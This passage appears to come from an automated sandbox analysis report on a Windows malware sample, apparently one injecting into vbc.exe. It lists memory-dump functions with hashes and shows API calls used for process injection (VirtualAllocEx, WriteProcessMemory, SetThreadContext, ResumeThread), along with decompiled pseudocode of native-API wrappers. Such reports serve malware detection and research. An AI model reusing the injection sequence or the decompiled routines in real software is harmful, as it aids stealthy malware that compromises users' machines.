CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0021F82C

Strings

l:6, xrefs: 0021F783
l:6, xrefs: 0021F909
l:6, xrefs: 0021F889

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID: CreateProcess
String ID: l:6$l:6$l:6
API String ID: 963392458-764902567
Opcode ID: f528c017bf04d950e6d332f44bcb6419ce96283b76297705290db975a86d13fa
Instruction ID: d91175bb25b82025e0ace00d65322d67b06a3d37e9651796185ca2ae25c7a937
Opcode Fuzzy Hash: f528c017bf04d950e6d332f44bcb6419ce96283b76297705290db975a86d13fa
Instruction Fuzzy Hash: 5281DE74C00269DFDB65CFA4C940BEDBBB6BF09304F1095AAE558B7260DB309A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004B0430, Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

v, xrefs: 004B0308
n, xrefs: 004B0509

Memory Dump Source

Source File: 00000004.00000002.2131813640.00000000004B0000.00000040.00000001.sdmp, Offset: 004B0000, based on PE: false

Similarity

API ID:
String ID: n$v
API String ID: 0-4119202455
Opcode ID: bf46c13802a3e95ffa37a3e9b50f29ec3cdec11ff6647f6d9172742eca373f85
Instruction ID: 1051a6b1b8cd818a9ee0c6a171109a2208d4bee349987e31c20bf11d155cf469
Opcode Fuzzy Hash: bf46c13802a3e95ffa37a3e9b50f29ec3cdec11ff6647f6d9172742eca373f85
Instruction Fuzzy Hash: 67714C70C09208DFCB20CFA4D4847EEBBF5BF4A316F20651AD51AA7251D7389842DF29

Uniqueness

Uniqueness Score: -1.00%

Function 004B04A5, Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

v, xrefs: 004B0308
n, xrefs: 004B0509

Memory Dump Source

Source File: 00000004.00000002.2131813640.00000000004B0000.00000040.00000001.sdmp, Offset: 004B0000, based on PE: false

Similarity

API ID:
String ID: n$v
API String ID: 0-4119202455
Opcode ID: a8b374ff701b38a8185e78fd9419d77748ac56fc02614f1c952a39ac87c32d08
Instruction ID: abc3c236672faa71b3f3cdb1c2d0df3fa5111875a5b34c54a503bd39836aaae0
Opcode Fuzzy Hash: a8b374ff701b38a8185e78fd9419d77748ac56fc02614f1c952a39ac87c32d08
Instruction Fuzzy Hash: 0B612A70D09218DFCB24CFA4D4846EEBBF5BB4A315F20652AD41AB7251E7388842DF29

Uniqueness

Uniqueness Score: -1.00%

Function 0021FCC8, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021FD9E

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 04b3a7f0a177be10ac9e76694ef2b28b61baaa20472b69b872d87565700ec42e
Instruction ID: 67758bb4914edd24b66a352bdfc69f085dcad5aeeab6450e123af4812246e8ab
Opcode Fuzzy Hash: 04b3a7f0a177be10ac9e76694ef2b28b61baaa20472b69b872d87565700ec42e
Instruction Fuzzy Hash: 02419AB5D002589FCF00CFA9D984AEEFBF1BB59310F24902AE818B7210D374AA55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0021FA98, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021FB4D

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5e4628c03df1f4a14e010b3cc1025bef90e357360d480ada4dd59fd5347b6e89
Instruction ID: c071ba9a4d696a17f0757d04d8c32fe40e0ed958c68c080026260a71f4111fcf
Opcode Fuzzy Hash: 5e4628c03df1f4a14e010b3cc1025bef90e357360d480ada4dd59fd5347b6e89
Instruction Fuzzy Hash: A04186B9D042589FCF10CFA9D984ADEFBF1BB19310F20A02AE814B7210D335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0021FBB8, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0021FC65

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: dbbf9477a6c3d7c12e462d158bdb1145cd36e33ef62d1239e6d459a79de215c5
Instruction ID: 1853a1424a4f249a69dd5fba99636f31a23b1ba41ef58df0b5371be98560f702
Opcode Fuzzy Hash: dbbf9477a6c3d7c12e462d158bdb1145cd36e33ef62d1239e6d459a79de215c5
Instruction Fuzzy Hash: D63166B9D002589FCF10CFA9D984ADEFBB5BB59310F20A42AE814B7310D335A955CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0021F980, Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0021FA32

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: edb7cae0b3d20dc1ad23282e4a5d306a28afdf678d7b2e1b7f3c378513ce57b2
Instruction ID: 74ca5d1e5bc4f98e8d336065409dd5fd55e46a007010dab9cedbbff0bbe6caa7
Opcode Fuzzy Hash: edb7cae0b3d20dc1ad23282e4a5d306a28afdf678d7b2e1b7f3c378513ce57b2
Instruction Fuzzy Hash: F23198B4D012599FCB10CFA9D984ADEFBF1BF49314F24802AE418B7210D378AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0021FE10, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0021FE8E

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0d414f1099268d6e7ef9c9cb7dfec41ce3f3f8085559789636e3e4b8921baebf
Instruction ID: 779f54ffe0c0dc1fce6176d631552b1738e65fc05b6905ae774738b77c02d196
Opcode Fuzzy Hash: 0d414f1099268d6e7ef9c9cb7dfec41ce3f3f8085559789636e3e4b8921baebf
Instruction Fuzzy Hash: 5221AAB4D102199FCB10CFA9E584ADEFBF4BB49314F24942AE818B7310C375A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131725468.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a91e8e9afb9760021526078cb80998bb6ecf96b9a7ece5b9e2fc93b7941d7ca
Instruction ID: af67dccd53256f0e5a6e3b39a4dfd6e2a0cdd5b5bedca71df29d4ea900be563e
Opcode Fuzzy Hash: 8a91e8e9afb9760021526078cb80998bb6ecf96b9a7ece5b9e2fc93b7941d7ca
Instruction Fuzzy Hash: 1221C275604208EFDB15DF50E980B26BBB5FF84318F24C9ADE84D5B246C736D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0017D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131725468.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9904b1ff55557aa2ccd87ee6edba5205810a6d93ab9f88ee8b7a47abe771d003
Instruction ID: f50a1668fae0921912576e8c4b73d660091397ff01cca81bfa4db4a06d0fa46e
Opcode Fuzzy Hash: 9904b1ff55557aa2ccd87ee6edba5205810a6d93ab9f88ee8b7a47abe771d003
Instruction Fuzzy Hash: F621C275604248DFDB18DF64E984B16BBB5EF84314F24C96DE80D4B246C736D847CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131725468.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d40e0e922833c35777e8b1bd4a4a952851b977ebe9d10399bdeb3e2b776a1bc
Instruction ID: 010ac03971f7b5c5e01b1c596d470a1c1e2a5fcbfb5e4ad2b58e231094d46eab
Opcode Fuzzy Hash: 5d40e0e922833c35777e8b1bd4a4a952851b977ebe9d10399bdeb3e2b776a1bc
Instruction Fuzzy Hash: C1218B755093848FCB12CF20D994B15BF71EF46314F28C5EAD8498B2A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131725468.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
Instruction ID: d3bef5629a7b6829a66bd2b85e2b4077902289926e9ba415b00031eb652856db
Opcode Fuzzy Hash: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
Instruction Fuzzy Hash: 33117675944284DFCB16CF10E584B15BBB1FF84324F28C6AAD8494B656C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0016D211, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131710097.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b0ad7e7677962cb22776fb221ceb0428473f0e4b6e6a0010e03bac35bb269c
Instruction ID: 117141b1a279ce68d40fa613da7336916fd057467b4061b20b810314ca002e0a
Opcode Fuzzy Hash: 39b0ad7e7677962cb22776fb221ceb0428473f0e4b6e6a0010e03bac35bb269c
Instruction Fuzzy Hash: D201A771908344DBE7149B55DC94BA7BBD8EF91364F18C41EED455B282C378DC50C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0016D210, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131710097.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8c5c300dc3d59dcab9653d9babf376073835f893a0d9657d7d798f14d34bcf
Instruction ID: 0a70622b1d877d08b76ba57ce4e6273841521ad33b6ffbc06031b412d143b377
Opcode Fuzzy Hash: db8c5c300dc3d59dcab9653d9babf376073835f893a0d9657d7d798f14d34bcf
Instruction Fuzzy Hash: DFF04F71904284AAEB108A15DC88B62FF98EF51764F18C45AED485B286C3789C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 004B0177, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131813640.00000000004B0000.00000040.00000001.sdmp, Offset: 004B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994bf2b9fa6c2ddcb3c8da089bafff627329c6827aaf009b351553bb2a308a39
Instruction ID: 72cf0b00e75b490c092c7b7c8bc2d5b14eabd768dcfa38e6bdd8e54ca6bbe2f4
Opcode Fuzzy Hash: 994bf2b9fa6c2ddcb3c8da089bafff627329c6827aaf009b351553bb2a308a39
Instruction Fuzzy Hash: 3CD0A73000E544CFC3025F14D85C5BD3E74FF06301B1400E6C0458E0A3C3780945EB31

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0021AB7D, Relevance: 6.8, Strings: 4, Instructions: 1803COMMON

Download Yara Rule

Strings

N;=, xrefs: 0021B2BD
@2Dm, xrefs: 0021AC50
TVDm, xrefs: 0021AC12
eUz, xrefs: 0021BF3B

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: @2Dm$N;=$TVDm$eUz
API String ID: 0-2500183334
Opcode ID: bcc4f89b6db17391b6d56ba7902d2e083096952b6234683f21ce5ea8f97d3c4d
Instruction ID: cba3f0be1c4842f41560e96c2337c2de919d1fc656254b15e02cfaba5f1e2daa
Opcode Fuzzy Hash: bcc4f89b6db17391b6d56ba7902d2e083096952b6234683f21ce5ea8f97d3c4d
Instruction Fuzzy Hash: 59039F7A600114EFDB469F94C984E95BBB2FF4E314B0A80D4E6095F276C732E9A1EF41

Uniqueness

Uniqueness Score: -1.00%

Function 0021D410, Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

]X~, xrefs: 0021D468
_B, xrefs: 0021D519
OOy0, xrefs: 0021D485

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: OOy0$]X~$_B
API String ID: 0-851427251
Opcode ID: a6d4fc3dde30568c6be8f6668bcff32324f83961ca8a7b1d463a95fa8976389a
Instruction ID: 45db2013188c2a5c87cf52bde32b73bc8d0f31a4bce061222708febc827927e2
Opcode Fuzzy Hash: a6d4fc3dde30568c6be8f6668bcff32324f83961ca8a7b1d463a95fa8976389a
Instruction Fuzzy Hash: A741D374E25506FFDB44CEA9C8414EEB7F3AB98304BA4CAA4D406DB344E274DAA19F14

Uniqueness

Uniqueness Score: -1.00%

Function 00214DE8, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2131742963.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf44d65b2453a73a01dd1f83319e9e2de9cf5d9b4e5557f1a3a8633eae7ac5c5
Instruction ID: 5aea3834a6d08c10d92d5101c2ae086c6dfdf5674a2f2e001b27928d7448542f
Opcode Fuzzy Hash: cf44d65b2453a73a01dd1f83319e9e2de9cf5d9b4e5557f1a3a8633eae7ac5c5
Instruction Fuzzy Hash: 1D11B671E146089BEB08DFABD8405EEFAF7AFD9300F14D43AD918BA264EB7045528F54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2768 Parent PID: 2436 vbc.exeCOMMON

Executed Functions

Function 001067C7, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 487nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0010691F

Strings

0, xrefs: 001069A7

Memory Dump Source

Source File: 00000005.00000002.2169815630.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
Instruction ID: ab3d02a6dca54e3fff125db7662bb56f024a94e0a9cf1f91bd9df6c4b283a00b
Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
Instruction Fuzzy Hash: 25F13070618A8C8FDB65EF68C895AEEB7E0FF98304F40462AE48ED7251DF749541CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 001067C2, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0010691F

Strings

0, xrefs: 0010684D

Memory Dump Source

Source File: 00000005.00000002.2169815630.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
Instruction ID: 0f230db56eddb5c113f0ff9edd9ea06df927407dd87ce9fde39017a862507af9
Opcode Fuzzy Hash: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
Instruction Fuzzy Hash: 0A512D70918A8C8FDB69EF68C8946EEB7F0FB98305F40462EE48AD7251DF709645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0041816A, Relevance: 1.6, APIs: 1, Instructions: 67
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041816A(void* __ebx, void* __eflags) {
				long _t29;
				void* _t37;
				void* _t51;
				void* _t52;
				intOrPtr* _t55;
				void* _t57;
				void* _t59;
				void* _t61;

				asm("lock scasb");
				_t23 = __ebx;
				if(__eflags <= 0) {
					_t10 = _t23 + 0xc40; // 0xc40
					E00418DB0(_t51, __ebx, _t10, _t37, 0, 0x28);
					_t29 = NtCreateFile( *(_t57 + 0xc),  *(_t57 + 0x10),  *(_t57 + 0x14),  *(_t57 + 0x18),  *(_t57 + 0x1c),  *(_t57 + 0x20),  *(_t57 + 0x24),  *(_t57 + 0x28),  *(_t57 + 0x2c),  *(_t57 + 0x30),  *(_t57 + 0x34)); // executed
					return _t29;
				} else {
					_t59 = _t61;
					_t30 =  *((intOrPtr*)(_t59 + 8));
					_t4 = _t30 + 0xc3c; // 0xc64
					_t55 = _t4;
					E00418DB0(_t51,  *((intOrPtr*)(_t59 + 8)), _t55,  *((intOrPtr*)( *((intOrPtr*)(_t59 + 8)) + 0x10)), 0, 0x27);
					return  *((intOrPtr*)( *_t55))( *((intOrPtr*)(_t59 + 0xc)),  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t59 + 0x14)),  *((intOrPtr*)(_t59 + 0x18)),  *((intOrPtr*)(_t59 + 0x1c)), _t52, _t57);
				}
			}

0x0041816b
0x0041816d
0x0041816e
0x004181bf
0x004181c7
0x004181fd
0x00418201
0x00418170
0x00418171
0x00418173
0x0041817f
0x0041817f
0x00418187
0x004181a9
0x004181a9

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fd13d7f135d361c77070787a977d7e089964650e70074c277194b874eced116f
Instruction ID: b4ae2401c00f430d84a641544166daeffdc039574adb8fc51e9ed721eed181a1
Opcode Fuzzy Hash: fd13d7f135d361c77070787a977d7e089964650e70074c277194b874eced116f
Instruction Fuzzy Hash: 0711D7B2640208ABCB04DF98DC85EEB77ADEF8C754F158159BA1997281CA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b19
0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AB, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004181AB(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _t15;
				long _t21;
				intOrPtr _t22;
				void* _t31;

				asm("sbb dh, [ecx+0x55ab336a]");
				_t15 = _a4;
				_t22 =  *((intOrPtr*)(_t15 + 0x10));
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t31, _t15, _t3, _t22, 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181ab
0x004181b3
0x004181b6
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2414a2f03ac86426e67827d10bc23e76baeebc1d7ff0e9a6d8389ed3539d4b
Instruction ID: 2e66243846e82f3693ccf42f559787f8c8407c61c6cc2efa06ccfa584bdea738
Opcode Fuzzy Hash: 8a2414a2f03ac86426e67827d10bc23e76baeebc1d7ff0e9a6d8389ed3539d4b
Instruction Fuzzy Hash: 7101BBB6204108AFCB48CF89DC95DDB37ADAF8C754F15824CFA1D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _t15;
				long _t21;
				intOrPtr _t22;
				void* _t31;

				_t15 = _a4;
				_t22 =  *((intOrPtr*)(_t15 + 0x10));
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t31, _t15, _t3, _t22, 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181b3
0x004181b6
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838A, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041838A(void* __eax, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;
				void* _t26;

				asm("popfd");
				asm("sbb [esi-0x74aa7b50], al");
				_t13 = _a4;
				_t4 = _t13 + 0xc60; // 0xca0
				E00418DB0(_t26, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}

0x0041838a
0x0041838c
0x00418393
0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4843542d9391a2c92054ad47db70ef61195ea91a370b1bdf3b11ff7a190979c3
Instruction ID: 324fda10d2b5e8c9d238fc08f5abfaf4a1adce358a1b4b5e93c0d1ca6bb04bc0
Opcode Fuzzy Hash: 4843542d9391a2c92054ad47db70ef61195ea91a370b1bdf3b11ff7a190979c3
Instruction Fuzzy Hash: 7AF05EB52002146FCB14CF99CC40EE77BA9AF88250F14825DBA4997281C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004182AA, Relevance: 1.5, APIs: 1, Instructions: 31
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004182AA(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				long _t7;
				void* _t14;
				void* _t16;
				void* _t17;
				intOrPtr* _t19;
				void* _t21;

				_t14 = __edx - 1;
				asm("bound edi, [ebp-0x4d]");
				if(_t14 < 0) {
					_push(es);
					_t7 = NtClose(_t14); // executed
					return _t7;
				} else {
					_t8 = _a4;
					_t2 = _t8 + 0x10; // 0x300
					_t3 = _t8 + 0xc4c; // 0x40972f
					_t19 = _t3;
					E00418DB0(_t16, _a4, _t19,  *_t2, 0, 0x2b);
					return  *((intOrPtr*)( *_t19))(_a8, _t17, _t21);
				}
			}

0x004182aa
0x004182ab
0x004182ae
0x00418300
0x00418305
0x00418309
0x004182b0
0x004182b3
0x004182b6
0x004182bf
0x004182bf
0x004182c7
0x004182d9
0x004182d9

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c8919f8786698a0e3701a5a834eadec6f034bee91c10c16b1b6aa5fa1067fadc
Instruction ID: a58b54dce177c4145e640b60745f9e37cbdbf7a8fa06e4c7cd69375a576836a9
Opcode Fuzzy Hash: c8919f8786698a0e3701a5a834eadec6f034bee91c10c16b1b6aa5fa1067fadc
